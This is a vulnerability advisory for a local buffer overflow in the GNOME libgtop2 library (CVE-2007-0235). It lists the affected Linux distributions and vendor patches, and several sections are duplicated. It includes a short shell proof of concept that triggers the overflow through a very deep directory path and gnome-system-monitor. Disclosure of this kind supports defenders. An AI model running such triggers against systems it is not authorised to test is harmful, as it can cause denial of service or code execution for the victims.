Libgtop2 Library Local Buffer Overflow Vulnerability
BID:22054
Info
Libgtop2 Library Local Buffer Overflow Vulnerability
| Bugtraq ID: | 22054 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2007-0235 |
| Remote: | No |
| Local: | Yes |
| Published: | Jan 15 2007 12:00AM |
| Updated: | Aug 08 2007 12:04AM |
| Credit: | Liu Qishuai is credited with discovering this issue. |
| Vulnerable: |
Ubuntu Ubuntu Linux 5.10 sparc Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 rPath rPath Linux 1 Redhat Enterprise Linux WS 4 Redhat Enterprise Linux ES 4 Redhat Enterprise Linux AS 4 Redhat Desktop 4.0 Mandriva Linux Mandrake 2007.0 x86_64 Mandriva Linux Mandrake 2007.0 GNOME Libgtop2 2.14.6 GNOME Libgtop2 2.6.0 Gentoo Linux Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha |
| Not Vulnerable: | |
Discussion
Libgtop2 Library Local Buffer Overflow Vulnerability
The 'libgtop2' library is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying into an insufficiently sized memory buffer.
An attacker may exploit this issue by enticing victims into viewing a maliciously crafted system process with an application that uses the affected library.
Successful exploits may cause arbitrary code to run with the privileges of the victim. Failed exploit attempts will likely cause denial-of-service conditions.
Versions prior to libgtop2 2.14.6 are reported vulnerable.
The 'libgtop2' library is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying into an insufficiently sized memory buffer.
An attacker may exploit this issue by enticing victims into viewing a maliciously crafted system process with an application that uses the affected library.
Successful exploits may cause arbitrary code to run with the privileges of the victim. Failed exploit attempts will likely cause denial-of-service conditions.
Versions prior to libgtop2 2.14.6 are reported vulnerable.
Exploit / POC
Libgtop2 Library Local Buffer Overflow Vulnerability
The following proof of concept may trigger this vulnerability:
export dir=$(perl -e " print 's/'x1000;")
mkdir -p $dir
cp /bin/sleep $dir
$dir/sleep 100 &
gnome-system-monitor
The following proof of concept may trigger this vulnerability:
export dir=$(perl -e " print 's/'x1000;")
mkdir -p $dir
cp /bin/sleep $dir
$dir/sleep 100 &
gnome-system-monitor
Solution / Fix
Libgtop2 Library Local Buffer Overflow Vulnerability
Solution:
The vendor released a patch to address this issue. Please see the references for details.
Mandriva Linux Mandrake 2007.0 x86_64
GNOME Libgtop2 2.14.6
Solution:
The vendor released a patch to address this issue. Please see the references for details.
Mandriva Linux Mandrake 2007.0 x86_64
-
Mandriva lib64gtop2.0_7-2.14.3-1.1mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva lib64gtop2.0_7-devel-2.14.3-1.1mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva libgtop2-2.14.3-1.1mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva libgtop2-2.14.3-1.1mdv2007.0.x86_64.rpm
Mandriva Linux 2007.0/X86_64:
http://www.mandriva.com/en/download
GNOME Libgtop2 2.14.6
-
GNOME procmap.c
http://bugzilla.gnome.org/attachment.cgi?id=80254
References
Libgtop2 Library Local Buffer Overflow Vulnerability
References:
References: